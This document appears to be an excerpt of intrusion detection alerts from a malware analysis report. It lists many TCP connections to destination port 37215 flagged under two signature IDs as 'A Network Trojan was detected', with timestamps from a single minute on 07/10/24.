                  SID:2835222
                  Source Port:54954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867570
                  SID:2829579
                  Source Port:41930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.026020
                  SID:2835222
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.749438
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.851748
                  SID:2835222
                  Source Port:32860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.803264
                  SID:2829579
                  Source Port:48696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867804
                  SID:2835222
                  Source Port:60700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875602
                  SID:2829579
                  Source Port:37724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611874
                  SID:2829579
                  Source Port:54606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.426647
                  SID:2835222
                  Source Port:49982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2829579
                  Source Port:58862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2835222
                  Source Port:49278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2829579
                  Source Port:44336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2829579
                  Source Port:54006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:55232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952249
                  SID:2835222
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2829579
                  Source Port:40424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2829579
                  Source Port:36438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027188
                  SID:2835222
                  Source Port:50086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763901
                  SID:2835222
                  Source Port:59682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.135196
                  SID:2835222
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879681
                  SID:2835222
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:50186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.350674
                  SID:2835222
                  Source Port:39988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155412
                  SID:2835222
                  Source Port:54852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.605859
                  SID:2829579
                  Source Port:33426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411505
                  SID:2835222
                  Source Port:52266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941431
                  SID:2829579
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2829579
                  Source Port:52726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.227623
                  SID:2835222
                  Source Port:47774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2829579
                  Source Port:33882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2835222
                  Source Port:58228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415225
                  SID:2835222
                  Source Port:38378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2835222
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.177272
                  SID:2835222
                  Source Port:43328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856939
                  SID:2829579
                  Source Port:43550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:55530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.097626
                  SID:2835222
                  Source Port:48318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2829579
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2829579
                  Source Port:35924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2835222
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189377
                  SID:2829579
                  Source Port:45956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.584694
                  SID:2835222
                  Source Port:33868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2829579
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213978
                  SID:2829579
                  Source Port:44794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2835222
                  Source Port:36696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949707
                  SID:2829579
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400529
                  SID:2829579
                  Source Port:34672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2835222
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483196
                  SID:2835222
                  Source Port:51230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2829579
                  Source Port:46528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2835222
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502645
                  SID:2829579
                  Source Port:40994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2835222
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2835222
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473474
                  SID:2829579
                  Source Port:57170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.763197
                  SID:2835222
                  Source Port:51162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2835222
                  Source Port:48310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.957871
                  SID:2829579
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.360438
                  SID:2835222
                  Source Port:37754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2829579
                  Source Port:41328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921196
                  SID:2829579
                  Source Port:40866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290151
                  SID:2835222
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2835222
                  Source Port:59560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2829579
                  Source Port:34956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.864368
                  SID:2829579
                  Source Port:47198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2829579
                  Source Port:45472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.565253
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522648
                  SID:2835222
                  Source Port:41650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.602276
                  SID:2835222
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2835222
                  Source Port:38892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.581833
                  SID:2835222
                  Source Port:49594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932459
                  SID:2829579
                  Source Port:49334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.297921
                  SID:2835222
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730026
                  SID:2829579
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.906366
                  SID:2835222
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117874
                  SID:2835222
                  Source Port:43822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2829579
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.942204
                  SID:2829579
                  Source Port:56036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198871
                  SID:2835222
                  Source Port:45908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2835222
                  Source Port:52844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2835222
                  Source Port:43620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.375701
                  SID:2829579
                  Source Port:58826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.861277
                  SID:2835222
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2835222
                  Source Port:40290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.369080
                  SID:2835222
                  Source Port:46198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457476
                  SID:2829579
                  Source Port:42740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757795
                  SID:2835222
                  Source Port:40658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047599
                  SID:2835222
                  Source Port:36876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2835222
                  Source Port:50984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479456
                  SID:2829579
                  Source Port:59882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.717127
                  SID:2835222
                  Source Port:47624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344718
                  SID:2835222
                  Source Port:44942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.525372
                  SID:2829579
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.880415
                  SID:2835222
                  Source Port:53988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2829579
                  Source Port:56582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514839
                  SID:2829579
                  Source Port:36174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2829579
                  Source Port:59418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.777206
                  SID:2835222
                  Source Port:51688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.180230
                  SID:2835222
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.895682
                  SID:2829579
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208199
                  SID:2829579
                  Source Port:53772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.104603
                  SID:2835222
                  Source Port:56856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781347
                  SID:2829579
                  Source Port:59268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.388758
                  SID:2835222
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344718
                  SID:2829579
                  Source Port:46794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.349931
                  SID:2835222
                  Source Port:54600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2829579
                  Source Port:45726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.976688
                  SID:2835222
                  Source Port:58144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2829579
                  Source Port:41742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.182366
                  SID:2829579
                  Source Port:40072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.961222
                  SID:2829579
                  Source Port:51506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2835222
                  Source Port:34268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564654
                  SID:2835222
                  Source Port:49850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2829579
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2835222
                  Source Port:55980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734859
                  SID:2835222
                  Source Port:53846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353894
                  SID:2829579
                  Source Port:49328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:57798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147425
                  SID:2829579
                  Source Port:42984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2835222
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2835222
                  Source Port:49924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2829579
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767767
                  SID:2835222
                  Source Port:54656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910863
                  SID:2835222
                  Source Port:41164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2829579
                  Source Port:35766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.805641
                  SID:2835222
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.204626
                  SID:2829579
                  Source Port:42902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208833
                  SID:2835222
                  Source Port:42100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2835222
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.544401
                  SID:2829579
                  Source Port:51204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526946
                  SID:2829579
                  Source Port:46962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218292
                  SID:2829579
                  Source Port:59728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.979192
                  SID:2835222
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:45650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.335427
                  SID:2829579
                  Source Port:55610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.952758
                  SID:2835222
                  Source Port:54854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2835222
                  Source Port:47666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2829579
                  Source Port:35456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.359500
                  SID:2835222
                  Source Port:42214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054744
                  SID:2835222
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2829579
                  Source Port:36252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.478130
                  SID:2829579
                  Source Port:40998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2835222
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2829579
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939930
                  SID:2835222
                  Source Port:54960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.644230
                  SID:2829579
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813637
                  SID:2835222
                  Source Port:49622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2829579
                  Source Port:37622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.213078
                  SID:2829579
                  Source Port:56562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
                  SID:2829579
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2835222
                  Source Port:44390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.189669
                  SID:2829579
                  Source Port:60262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.636753
                  SID:2835222
                  Source Port:50634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2835222
                  Source Port:43670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850183
                  SID:2829579
                  Source Port:54598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.831201
                  SID:2829579
                  Source Port:34140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805292
                  SID:2829579
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.791208
                  SID:2835222
                  Source Port:33036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228376
                  SID:2835222
                  Source Port:60874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.764309
                  SID:2835222
                  Source Port:52798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433528
                  SID:2835222
                  Source Port:60428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2835222
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.863039
                  SID:2835222
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.792244
                  SID:2829579
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.972305
                  SID:2835222
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2835222
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985311
                  SID:2829579
                  Source Port:33548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289200
                  SID:2829579
                  Source Port:42908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564060
                  SID:2835222
                  Source Port:35504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510690
                  SID:2835222
                  Source Port:47364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2829579
                  Source Port:38216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2835222
                  Source Port:54450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2829579
                  Source Port:46008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2829579
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847797
                  SID:2835222
                  Source Port:56304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2835222
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998046
                  SID:2835222
                  Source Port:39150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2829579
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037412
                  SID:2835222
                  Source Port:37374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:55048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
